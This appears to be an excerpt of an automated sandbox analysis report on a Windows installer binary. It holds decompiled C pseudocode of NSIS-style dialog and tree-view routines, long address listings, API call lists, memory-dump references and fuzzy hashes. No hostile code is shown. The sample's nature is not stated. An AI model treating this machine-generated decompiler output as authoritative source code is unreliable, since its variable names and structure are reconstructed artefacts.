                                                                                                                                                                                                              					} while (_t327 < 0x21);
                                                                                                                                                                                                              					_t328 = _a16;
                                                                                                                                                                                                              					_push( *((intOrPtr*)(_t328 + 0x30 + _v20 * 4)));
                                                                                                                                                                                                              					_push(0x15);
                                                                                                                                                                                                              					E004042AC(_a4);
                                                                                                                                                                                                              					_push( *((intOrPtr*)(_t328 + 0x34 + _v20 * 4)));
                                                                                                                                                                                                              					_push(0x16);
                                                                                                                                                                                                              					E004042AC(_a4);
                                                                                                                                                                                                              					_t329 = 0;
                                                                                                                                                                                                              					_v16 = 0;
                                                                                                                                                                                                              					if( *0x42478c <= 0) {
                                                                                                                                                                                                              						L19:
                                                                                                                                                                                                              						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
                                                                                                                                                                                                              						goto L20;
                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                              						_t316 = _v24 + 8;
                                                                                                                                                                                                              						_v32 = _t316;
                                                                                                                                                                                                              						do {
                                                                                                                                                                                                              							_t284 =  &(_t316[0x10]);
                                                                                                                                                                                                              							if( *_t284 != 0) {
                                                                                                                                                                                                              								_v64 = _t284;
                                                                                                                                                                                                              								_t285 =  *_t316;
                                                                                                                                                                                                              								_v88 = _v16;
                                                                                                                                                                                                              								_t308 = 0x20;
                                                                                                                                                                                                              								_v84 = 0xffff0002;
                                                                                                                                                                                                              								_v80 = 0xd;
                                                                                                                                                                                                              								_v68 = _t308;
                                                                                                                                                                                                              								_v44 = _t329;
                                                                                                                                                                                                              								_v72 = _t285 & _t308;
                                                                                                                                                                                                              								if((_t285 & 0x00000002) == 0) {
                                                                                                                                                                                                              									if((_t285 & 0x00000004) == 0) {
                                                                                                                                                                                                              										 *( *0x420d48 + _t329 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v88);
                                                                                                                                                                                                              									} else {
                                                                                                                                                                                                              										_v16 = SendMessageA(_v8, 0x110a, 3, _v16);
                                                                                                                                                                                                              									}
                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                              									_v80 = 0x4d;
                                                                                                                                                                                                              									_v48 = 1;
                                                                                                                                                                                                              									_t290 = SendMessageA(_v8, 0x1100, 0,  &_v88);
                                                                                                                                                                                                              									_v36 = 1;
                                                                                                                                                                                                              									 *( *0x420d48 + _t329 * 4) = _t290;
                                                                                                                                                                                                              									_v16 =  *( *0x420d48 + _t329 * 4);
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							_t329 = _t329 + 1;
                                                                                                                                                                                                              							_t316 =  &(_v32[0x418]);
                                                                                                                                                                                                              							_v32 = _t316;
                                                                                                                                                                                                              						} while (_t329 <  *0x42478c);
                                                                                                                                                                                                              						if(_v36 != 0) {
                                                                                                                                                                                                              							L20:
                                                                                                                                                                                                              							if(_v20 != 0) {
                                                                                                                                                                                                              								E004042E1(_v8);
                                                                                                                                                                                                              								goto L23;
                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                              								ShowWindow(_v12, 5);
                                                                                                                                                                                                              								E004042E1(_v12);
                                                                                                                                                                                                              								L93:
                                                                                                                                                                                                              								return E00404313(_a8, _a12, _a16);
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						goto L19;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              			}


























































                                                                                                                                                                                                              0x00404ccf
                                                                                                                                                                                                              0x00404cd7
                                                                                                                                                                                                              0x00404cdf
                                                                                                                                                                                                              0x00404ce5
                                                                                                                                                                                                              0x00404cfd
                                                                                                                                                                                                              0x00404d00
                                                                                                                                                                                                              0x00404d01
                                                                                                                                                                                                              0x00404f2e
                                                                                                                                                                                                              0x00404f35
                                                                                                                                                                                                              0x00404f49
                                                                                                                                                                                                              0x00404f37
                                                                                                                                                                                                              0x00404f39
                                                                                                                                                                                                              0x00404f3c
                                                                                                                                                                                                              0x00404f3d
                                                                                                                                                                                                              0x00404f44
                                                                                                                                                                                                              0x00404f44
                                                                                                                                                                                                              0x00404f55
                                                                                                                                                                                                              0x00404f63
                                                                                                                                                                                                              0x00404f66
                                                                                                                                                                                                              0x00404f7c
                                                                                                                                                                                                              0x00404ff1
                                                                                                                                                                                                              0x00404ff4
                                                                                                                                                                                                              0x00404ff6
                                                                                                                                                                                                              0x00405000
                                                                                                                                                                                                              0x0040500e
                                                                                                                                                                                                              0x0040500e
                                                                                                                                                                                                              0x00405010
                                                                                                                                                                                                              0x0040501a
                                                                                                                                                                                                              0x00405020
                                                                                                                                                                                                              0x00405023
                                                                                                                                                                                                              0x00405026
                                                                                                                                                                                                              0x00405041
                                                                                                                                                                                                              0x00405028
                                                                                                                                                                                                              0x00405032
                                                                                                                                                                                                              0x00405032
                                                                                                                                                                                                              0x00405026
                                                                                                                                                                                                              0x0040501a
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00404ff4
                                                                                                                                                                                                              0x00404f81
                                                                                                                                                                                                              0x00404f8c
                                                                                                                                                                                                              0x00404f91
                                                                                                                                                                                                              0x00404f98
                                                                                                                                                                                                              0x00404f9d
                                                                                                                                                                                                              0x00404fa1
                                                                                                                                                                                                              0x00404fac
                                                                                                                                                                                                              0x00404fac
                                                                                                                                                                                                              0x00404fb0
                                                                                                                                                                                                              0x00404fb4
                                                                                                                                                                                                              0x00404fb8
                                                                                                                                                                                                              0x00404fcb
                                                                                                                                                                                                              0x00404fba
                                                                                                                                                                                                              0x00404fba
                                                                                                                                                                                                              0x00404fc1
                                                                                                                                                                                                              0x00404fc7
                                                                                                                                                                                                              0x00404fc3
                                                                                                                                                                                                              0x00404fc3
                                                                                                                                                                                                              0x00404fc3
                                                                                                                                                                                                              0x00404fc1
                                                                                                                                                                                                              0x00404fcf
                                                                                                                                                                                                              0x00404fd1
                                                                                                                                                                                                              0x00404fe4
                                                                                                                                                                                                              0x00404fe7
                                                                                                                                                                                                              0x00404fea
                                                                                                                                                                                                              0x00404fea
                                                                                                                                                                                                              0x00404fb4
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00404fa1
                                                                                                                                                                                                              0x00404f83
                                                                                                                                                                                                              0x00404f8a
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00405044
                                                                                                                                                                                                              0x00405044
                                                                                                                                                                                                              0x0040504b
                                                                                                                                                                                                              0x004050bc
                                                                                                                                                                                                              0x004050c4
                                                                                                                                                                                                              0x004050cc
                                                                                                                                                                                                              0x004050cc
                                                                                                                                                                                                              0x004050d5
                                                                                                                                                                                                              0x004050d7
                                                                                                                                                                                                              0x004050de
                                                                                                                                                                                                              0x004050e1
                                                                                                                                                                                                              0x004050e1
                                                                                                                                                                                                              0x004050e7
                                                                                                                                                                                                              0x004050ee
                                                                                                                                                                                                              0x004050f1
                                                                                                                                                                                                              0x004050f1
                                                                                                                                                                                                              0x004050f7
                                                                                                                                                                                                              0x004050fd
                                                                                                                                                                                                              0x00405103
                                                                                                                                                                                                              0x00405103
                                                                                                                                                                                                              0x00405110
                                                                                                                                                                                                              0x00405270
                                                                                                                                                                                                              0x00405277
                                                                                                                                                                                                              0x00405294
                                                                                                                                                                                                              0x0040529a
                                                                                                                                                                                                              0x004052ac
                                                                                                                                                                                                              0x004052ac
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00405116
                                                                                                                                                                                                              0x00405118
                                                                                                                                                                                                              0x0040511d
                                                                                                                                                                                                              0x00405122
                                                                                                                                                                                                              0x00405127
                                                                                                                                                                                                              0x00405129
                                                                                                                                                                                                              0x00405129
                                                                                                                                                                                                              0x0040512a
                                                                                                                                                                                                              0x0040512b
                                                                                                                                                                                                              0x0040512d
                                                                                                                                                                                                              0x0040512d
                                                                                                                                                                                                              0x00405135
                                                                                                                                                                                                              0x00405176
                                                                                                                                                                                                              0x00405178
                                                                                                                                                                                                              0x00405188
                                                                                                                                                                                                              0x0040518b
                                                                                                                                                                                                              0x00405190
                                                                                                                                                                                                              0x00405197
                                                                                                                                                                                                              0x0040519a
                                                                                                                                                                                                              0x0040523c
                                                                                                                                                                                                              0x00405244
                                                                                                                                                                                                              0x0040524c
                                                                                                                                                                                                              0x0040524c
                                                                                                                                                                                                              0x00405252
                                                                                                                                                                                                              0x0040525a
                                                                                                                                                                                                              0x0040526b
                                                                                                                                                                                                              0x0040526b
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x0040525a
                                                                                                                                                                                                              0x004051a0
                                                                                                                                                                                                              0x004051a3
                                                                                                                                                                                                              0x004051a9
                                                                                                                                                                                                              0x004051ae
                                                                                                                                                                                                              0x004051b0
                                                                                                                                                                                                              0x004051b2
                                                                                                                                                                                                              0x004051b8
                                                                                                                                                                                                              0x004051bf
                                                                                                                                                                                                              0x004051c4
                                                                                                                                                                                                              0x004051cb
                                                                                                                                                                                                              0x004051ce
                                                                                                                                                                                                              0x004051ce
                                                                                                                                                                                                              0x004051d5
                                                                                                                                                                                                              0x004051e1
                                                                                                                                                                                                              0x004051e5
                                                                                                                                                                                                              0x004051e7
                                                                                                                                                                                                              0x004051e7
                                                                                                                                                                                                              0x004051d7
                                                                                                                                                                                                              0x004051d9
                                                                                                                                                                                                              0x004051d9
                                                                                                                                                                                                              0x00405207
                                                                                                                                                                                                              0x00405213
                                                                                                                                                                                                              0x00405222
                                                                                                                                                                                                              0x00405222
                                                                                                                                                                                                              0x00405224
                                                                                                                                                                                                              0x00405227
                                                                                                                                                                                                              0x00405230
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00405137
                                                                                                                                                                                                              0x00405142
                                                                                                                                                                                                              0x00405145
                                                                                                                                                                                                              0x0040514a
                                                                                                                                                                                                              0x0040514c
                                                                                                                                                                                                              0x00405150
                                                                                                                                                                                                              0x00405160
                                                                                                                                                                                                              0x0040516a
                                                                                                                                                                                                              0x0040516c
                                                                                                                                                                                                              0x0040516f
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00405152
                                                                                                                                                                                                              0x00405152
                                                                                                                                                                                                              0x00405158
                                                                                                                                                                                                              0x0040515a
                                                                                                                                                                                                              0x0040515a
                                                                                                                                                                                                              0x0040515b
                                                                                                                                                                                                              0x0040515c
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00405152
                                                                                                                                                                                                              0x00405135
                                                                                                                                                                                                              0x00405110
                                                                                                                                                                                                              0x00405053
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00405069
                                                                                                                                                                                                              0x00405073
                                                                                                                                                                                                              0x00405078
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x0040508a
                                                                                                                                                                                                              0x0040508f
                                                                                                                                                                                                              0x0040509b
                                                                                                                                                                                                              0x0040509b
                                                                                                                                                                                                              0x0040509d
                                                                                                                                                                                                              0x004050ac
                                                                                                                                                                                                              0x004050ae
                                                                                                                                                                                                              0x004050b2
                                                                                                                                                                                                              0x004050b5
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x004050b5
                                                                                                                                                                                                              0x00405053
                                                                                                                                                                                                              0x00404d07
                                                                                                                                                                                                              0x00404d0a
                                                                                                                                                                                                              0x00404d0d
                                                                                                                                                                                                              0x00404d1d
                                                                                                                                                                                                              0x00404d30
                                                                                                                                                                                                              0x00404d3b
                                                                                                                                                                                                              0x00404d41
                                                                                                                                                                                                              0x00404d4f
                                                                                                                                                                                                              0x00404d62
                                                                                                                                                                                                              0x00404d67
                                                                                                                                                                                                              0x00404d72
                                                                                                                                                                                                              0x00404d7b
                                                                                                                                                                                                              0x00404d91
                                                                                                                                                                                                              0x00404da1
                                                                                                                                                                                                              0x00404dad
                                                                                                                                                                                                              0x00404dad
                                                                                                                                                                                                              0x00404db2
                                                                                                                                                                                                              0x00404db8
                                                                                                                                                                                                              0x00404dba
                                                                                                                                                                                                              0x00404dbd
                                                                                                                                                                                                              0x00404dc2
                                                                                                                                                                                                              0x00404dc7
                                                                                                                                                                                                              0x00404dc9
                                                                                                                                                                                                              0x00404dc9
                                                                                                                                                                                                              0x00404de9
                                                                                                                                                                                                              0x00404de9
                                                                                                                                                                                                              0x00404deb
                                                                                                                                                                                                              0x00404dec
                                                                                                                                                                                                              0x00404df1
                                                                                                                                                                                                              0x00404df7
                                                                                                                                                                                                              0x00404dfb
                                                                                                                                                                                                              0x00404e00
                                                                                                                                                                                                              0x00404e08
                                                                                                                                                                                                              0x00404e0c
                                                                                                                                                                                                              0x00404e11
                                                                                                                                                                                                              0x00404e16
                                                                                                                                                                                                              0x00404e1e
                                                                                                                                                                                                              0x00404e21
                                                                                                                                                                                                              0x00404ef0
                                                                                                                                                                                                              0x00404f03
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00404e27
                                                                                                                                                                                                              0x00404e2a
                                                                                                                                                                                                              0x00404e2d
                                                                                                                                                                                                              0x00404e30
                                                                                                                                                                                                              0x00404e30
                                                                                                                                                                                                              0x00404e35
                                                                                                                                                                                                              0x00404e3e
                                                                                                                                                                                                              0x00404e41
                                                                                                                                                                                                              0x00404e45
                                                                                                                                                                                                              0x00404e48
                                                                                                                                                                                                              0x00404e4b
                                                                                                                                                                                                              0x00404e54
                                                                                                                                                                                                              0x00404e5d
                                                                                                                                                                                                              0x00404e60
                                                                                                                                                                                                              0x00404e63
                                                                                                                                                                                                              0x00404e66
                                                                                                                                                                                                              0x00404ea4
                                                                                                                                                                                                              0x00404ecf
                                                                                                                                                                                                              0x00404ea6
                                                                                                                                                                                                              0x00404eb5
                                                                                                                                                                                                              0x00404eb5
                                                                                                                                                                                                              0x00404e68
                                                                                                                                                                                                              0x00404e6b
                                                                                                                                                                                                              0x00404e79
                                                                                                                                                                                                              0x00404e83
                                                                                                                                                                                                              0x00404e8b
                                                                                                                                                                                                              0x00404e92
                                                                                                                                                                                                              0x00404e9d
                                                                                                                                                                                                              0x00404e9d
                                                                                                                                                                                                              0x00404e66
                                                                                                                                                                                                              0x00404ed5
                                                                                                                                                                                                              0x00404ed6
                                                                                                                                                                                                              0x00404ee2
                                                                                                                                                                                                              0x00404ee2
                                                                                                                                                                                                              0x00404eee
                                                                                                                                                                                                              0x00404f09
                                                                                                                                                                                                              0x00404f0c
                                                                                                                                                                                                              0x00404f29
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00404f0e
                                                                                                                                                                                                              0x00404f13
                                                                                                                                                                                                              0x00404f1c
                                                                                                                                                                                                              0x004052ae
                                                                                                                                                                                                              0x004052c0
                                                                                                                                                                                                              0x004052c0
                                                                                                                                                                                                              0x00404f0c
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00404eee
                                                                                                                                                                                                              0x00404e21

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003F9), ref: 00404CC8
                                                                                                                                                                                                              • GetDlgItem.USER32(?,00000408), ref: 00404CD5
                                                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 00404D24
                                                                                                                                                                                                              • LoadImageA.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404D3B
                                                                                                                                                                                                              • SetWindowLongA.USER32 ref: 00404D55
                                                                                                                                                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D67
                                                                                                                                                                                                              • ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404D7B
                                                                                                                                                                                                              • SendMessageA.USER32 ref: 00404D91
                                                                                                                                                                                                              • SendMessageA.USER32 ref: 00404D9D
                                                                                                                                                                                                              • SendMessageA.USER32 ref: 00404DAD
                                                                                                                                                                                                              • DeleteObject.GDI32(00000110), ref: 00404DB2
                                                                                                                                                                                                              • SendMessageA.USER32 ref: 00404DDD
                                                                                                                                                                                                              • SendMessageA.USER32 ref: 00404DE9
                                                                                                                                                                                                              • SendMessageA.USER32 ref: 00404E83
                                                                                                                                                                                                              • SendMessageA.USER32 ref: 00404EB3
                                                                                                                                                                                                                • Part of subcall function 004042E1: SendMessageA.USER32 ref: 004042EF
                                                                                                                                                                                                              • SendMessageA.USER32 ref: 00404EC7
                                                                                                                                                                                                              • GetWindowLongA.USER32(?,000000F0), ref: 00404EF5
                                                                                                                                                                                                              • SetWindowLongA.USER32 ref: 00404F03
                                                                                                                                                                                                              • ShowWindow.USER32(?,00000005), ref: 00404F13
                                                                                                                                                                                                              • SendMessageA.USER32 ref: 0040500E
                                                                                                                                                                                                              • SendMessageA.USER32 ref: 00405073
                                                                                                                                                                                                              • SendMessageA.USER32 ref: 00405088
                                                                                                                                                                                                              • SendMessageA.USER32 ref: 004050AC
                                                                                                                                                                                                              • SendMessageA.USER32 ref: 004050CC
                                                                                                                                                                                                              • ImageList_Destroy.COMCTL32(?), ref: 004050E1
                                                                                                                                                                                                              • GlobalFree.KERNEL32(?), ref: 004050F1
                                                                                                                                                                                                              • SendMessageA.USER32 ref: 0040516A
                                                                                                                                                                                                              • SendMessageA.USER32 ref: 00405213
                                                                                                                                                                                                              • SendMessageA.USER32 ref: 00405222
                                                                                                                                                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 0040524C
                                                                                                                                                                                                              • ShowWindow.USER32(?,00000000), ref: 0040529A
                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003FE), ref: 004052A5
                                                                                                                                                                                                              • ShowWindow.USER32(00000000), ref: 004052AC
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000004.00000002.2181022319.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181017810.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181028739.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181033509.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181041314.0000000000423000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181045047.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181050062.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                                                              • String ID: $M$N
                                                                                                                                                                                                              • API String ID: 2564846305-813528018
                                                                                                                                                                                                              • Opcode ID: 2a089ffaa6d080d8f9741abd0f9240871e5015f633a6bdd7d3a40dad24a0061c
                                                                                                                                                                                                              • Instruction ID: 1f2220219548b190c7fc9fe52a988bdfc75827026f4451c66edb8ee187498390
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2a089ffaa6d080d8f9741abd0f9240871e5015f633a6bdd7d3a40dad24a0061c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 33025DB0A00209AFDB20DF94DD45AAE7BB5FB84354F10817AF610BA2E1C7789D52DF58
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              C-Code - Quality: 85%
                                                                                                                                                                                                              			E00403DD8(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
                                                                                                                                                                                                              				struct HWND__* _v32;
                                                                                                                                                                                                              				void* _v80;
                                                                                                                                                                                                              				void* _v84;
                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                              				signed int _t35;
                                                                                                                                                                                                              				signed int _t37;
                                                                                                                                                                                                              				signed int _t39;
                                                                                                                                                                                                              				struct HWND__* _t49;
                                                                                                                                                                                                              				signed int _t68;
                                                                                                                                                                                                              				struct HWND__* _t74;
                                                                                                                                                                                                              				signed int _t87;
                                                                                                                                                                                                              				struct HWND__* _t92;
                                                                                                                                                                                                              				signed int _t100;
                                                                                                                                                                                                              				int _t104;
                                                                                                                                                                                                              				signed int _t116;
                                                                                                                                                                                                              				signed int _t117;
                                                                                                                                                                                                              				int _t118;
                                                                                                                                                                                                              				signed int _t123;
                                                                                                                                                                                                              				struct HWND__* _t126;
                                                                                                                                                                                                              				struct HWND__* _t127;
                                                                                                                                                                                                              				int _t128;
                                                                                                                                                                                                              				long _t131;
                                                                                                                                                                                                              				int _t133;
                                                                                                                                                                                                              				int _t134;
                                                                                                                                                                                                              				void* _t135;
                                                                                                                                                                                                              				void* _t143;
                                                                                                                                                                                                              
                                                                                                                                                                                                              				_t116 = _a8;
                                                                                                                                                                                                              				if(_t116 == 0x110 || _t116 == 0x408) {
                                                                                                                                                                                                              					_t35 = _a12;
                                                                                                                                                                                                              					_t126 = _a4;
                                                                                                                                                                                                              					__eflags = _t116 - 0x110;
                                                                                                                                                                                                              					 *0x420d38 = _t35;
                                                                                                                                                                                                              					if(_t116 == 0x110) {
                                                                                                                                                                                                              						 *0x424748 = _t126;
                                                                                                                                                                                                              						 *0x420d4c = GetDlgItem(_t126, 1);
                                                                                                                                                                                                              						_t92 = GetDlgItem(_t126, 2);
                                                                                                                                                                                                              						_push(0xffffffff);
                                                                                                                                                                                                              						_push(0x1c);
                                                                                                                                                                                                              						 *0x41fd18 = _t92;
                                                                                                                                                                                                              						E004042AC(_t126);
                                                                                                                                                                                                              						SetClassLongA(_t126, 0xfffffff2,  *0x423f28);
                                                                                                                                                                                                              						 *0x423f0c = E0040140B(4);
                                                                                                                                                                                                              						_t35 = 1;
                                                                                                                                                                                                              						__eflags = 1;
                                                                                                                                                                                                              						 *0x420d38 = 1;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					_t123 =  *0x40a1f8; // 0xffffffff
                                                                                                                                                                                                              					_t134 = 0;
                                                                                                                                                                                                              					_t131 = (_t123 << 6) +  *0x424780;
                                                                                                                                                                                                              					__eflags = _t123;
                                                                                                                                                                                                              					if(_t123 < 0) {
                                                                                                                                                                                                              						L34:
                                                                                                                                                                                                              						E004042F8(0x40b);
                                                                                                                                                                                                              						while(1) {
                                                                                                                                                                                                              							_t37 =  *0x420d38;
                                                                                                                                                                                                              							 *0x40a1f8 =  *0x40a1f8 + _t37;
                                                                                                                                                                                                              							_t131 = _t131 + (_t37 << 6);
                                                                                                                                                                                                              							_t39 =  *0x40a1f8; // 0xffffffff
                                                                                                                                                                                                              							__eflags = _t39 -  *0x424784;
                                                                                                                                                                                                              							if(_t39 ==  *0x424784) {
                                                                                                                                                                                                              								E0040140B(1);
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							__eflags =  *0x423f0c - _t134; // 0x0
                                                                                                                                                                                                              							if(__eflags != 0) {
                                                                                                                                                                                                              								break;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							__eflags =  *0x40a1f8 -  *0x424784; // 0xffffffff
                                                                                                                                                                                                              							if(__eflags >= 0) {
                                                                                                                                                                                                              								break;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							_t117 =  *(_t131 + 0x14);
                                                                                                                                                                                                              							E004062BB(_t117, _t126, _t131, 0x42c800,  *((intOrPtr*)(_t131 + 0x24)));
                                                                                                                                                                                                              							_push( *((intOrPtr*)(_t131 + 0x20)));
                                                                                                                                                                                                              							_push(0xfffffc19);
                                                                                                                                                                                                              							E004042AC(_t126);
                                                                                                                                                                                                              							_push( *((intOrPtr*)(_t131 + 0x1c)));
                                                                                                                                                                                                              							_push(0xfffffc1b);
                                                                                                                                                                                                              							E004042AC(_t126);
                                                                                                                                                                                                              							_push( *((intOrPtr*)(_t131 + 0x28)));
                                                                                                                                                                                                              							_push(0xfffffc1a);
                                                                                                                                                                                                              							E004042AC(_t126);
                                                                                                                                                                                                              							_t49 = GetDlgItem(_t126, 3);
                                                                                                                                                                                                              							__eflags =  *0x4247ec - _t134;
                                                                                                                                                                                                              							_v32 = _t49;
                                                                                                                                                                                                              							if( *0x4247ec != _t134) {
                                                                                                                                                                                                              								_t117 = _t117 & 0x0000fefd | 0x00000004;
                                                                                                                                                                                                              								__eflags = _t117;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							ShowWindow(_t49, _t117 & 0x00000008);
                                                                                                                                                                                                              							EnableWindow( *(_t135 + 0x30), _t117 & 0x00000100);
                                                                                                                                                                                                              							E004042CE(_t117 & 0x00000002);
                                                                                                                                                                                                              							_t118 = _t117 & 0x00000004;
                                                                                                                                                                                                              							EnableWindow( *0x41fd18, _t118);
                                                                                                                                                                                                              							__eflags = _t118 - _t134;
                                                                                                                                                                                                              							if(_t118 == _t134) {
                                                                                                                                                                                                              								_push(1);
                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                              								_push(_t134);
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							EnableMenuItem(GetSystemMenu(_t126, _t134), 0xf060, ??);
                                                                                                                                                                                                              							SendMessageA( *(_t135 + 0x38), 0xf4, _t134, 1);
                                                                                                                                                                                                              							__eflags =  *0x4247ec - _t134;
                                                                                                                                                                                                              							if( *0x4247ec == _t134) {
                                                                                                                                                                                                              								_push( *0x420d4c);
                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                              								SendMessageA(_t126, 0x401, 2, _t134);
                                                                                                                                                                                                              								_push( *0x41fd18);
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							E004042E1();
                                                                                                                                                                                                              							E00406228(0x420d50, E00403DB9());
                                                                                                                                                                                                              							E004062BB(0x420d50, _t126, _t131,  &(0x420d50[lstrlenA(0x420d50)]),  *((intOrPtr*)(_t131 + 0x18)));
                                                                                                                                                                                                              							SetWindowTextA(_t126, 0x420d50);
                                                                                                                                                                                                              							_t68 = E00401389( *((intOrPtr*)(_t131 + 8)), _t134);
                                                                                                                                                                                                              							__eflags = _t68;
                                                                                                                                                                                                              							if(_t68 != 0) {
                                                                                                                                                                                                              								continue;
                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                              								__eflags =  *_t131 - _t134;
                                                                                                                                                                                                              								if( *_t131 == _t134) {
                                                                                                                                                                                                              									continue;
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              								__eflags =  *(_t131 + 4) - 5;
                                                                                                                                                                                                              								if( *(_t131 + 4) != 5) {
                                                                                                                                                                                                              									DestroyWindow( *0x423f18);
                                                                                                                                                                                                              									 *0x420528 = _t131;
                                                                                                                                                                                                              									__eflags =  *_t131 - _t134;
                                                                                                                                                                                                              									if( *_t131 <= _t134) {
                                                                                                                                                                                                              										goto L58;
                                                                                                                                                                                                              									}
                                                                                                                                                                                                              									_t74 = CreateDialogParamA( *0x424740,  *_t131 +  *0x423f20 & 0x0000ffff, _t126,  *(0x40a1fc +  *(_t131 + 4) * 4), _t131);
                                                                                                                                                                                                              									__eflags = _t74 - _t134;
                                                                                                                                                                                                              									 *0x423f18 = _t74;
                                                                                                                                                                                                              									if(_t74 == _t134) {
                                                                                                                                                                                                              										goto L58;
                                                                                                                                                                                                              									}
                                                                                                                                                                                                              									_push( *((intOrPtr*)(_t131 + 0x2c)));
                                                                                                                                                                                                              									_push(6);
                                                                                                                                                                                                              									E004042AC(_t74);
                                                                                                                                                                                                              									GetWindowRect(GetDlgItem(_t126, 0x3fa), _t135 + 0x10);
                                                                                                                                                                                                              									ScreenToClient(_t126, _t135 + 0x10);
                                                                                                                                                                                                              									SetWindowPos( *0x423f18, _t134,  *(_t135 + 0x20),  *(_t135 + 0x20), _t134, _t134, 0x15);
                                                                                                                                                                                                              									E00401389( *((intOrPtr*)(_t131 + 0xc)), _t134);
                                                                                                                                                                                                              									__eflags =  *0x423f0c - _t134; // 0x0
                                                                                                                                                                                                              									if(__eflags != 0) {
                                                                                                                                                                                                              										goto L61;
                                                                                                                                                                                                              									}
                                                                                                                                                                                                              									ShowWindow( *0x423f18, 8);
                                                                                                                                                                                                              									E004042F8(0x405);
                                                                                                                                                                                                              									goto L58;
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              								__eflags =  *0x4247ec - _t134;
                                                                                                                                                                                                              								if( *0x4247ec != _t134) {
                                                                                                                                                                                                              									goto L61;
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              								__eflags =  *0x4247e0 - _t134;
                                                                                                                                                                                                              								if( *0x4247e0 != _t134) {
                                                                                                                                                                                                              									continue;
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              								goto L61;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						DestroyWindow( *0x423f18);
                                                                                                                                                                                                              						 *0x424748 = _t134;
                                                                                                                                                                                                              						EndDialog(_t126,  *0x420120);
                                                                                                                                                                                                              						goto L58;
                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                              						__eflags = _t35 - 1;
                                                                                                                                                                                                              						if(_t35 != 1) {
                                                                                                                                                                                                              							L33:
                                                                                                                                                                                                              							__eflags =  *_t131 - _t134;
                                                                                                                                                                                                              							if( *_t131 == _t134) {
                                                                                                                                                                                                              								goto L61;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							goto L34;
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						_t87 = E00401389( *((intOrPtr*)(_t131 + 0x10)), 0);
                                                                                                                                                                                                              						__eflags = _t87;
                                                                                                                                                                                                              						if(_t87 == 0) {
                                                                                                                                                                                                              							goto L33;
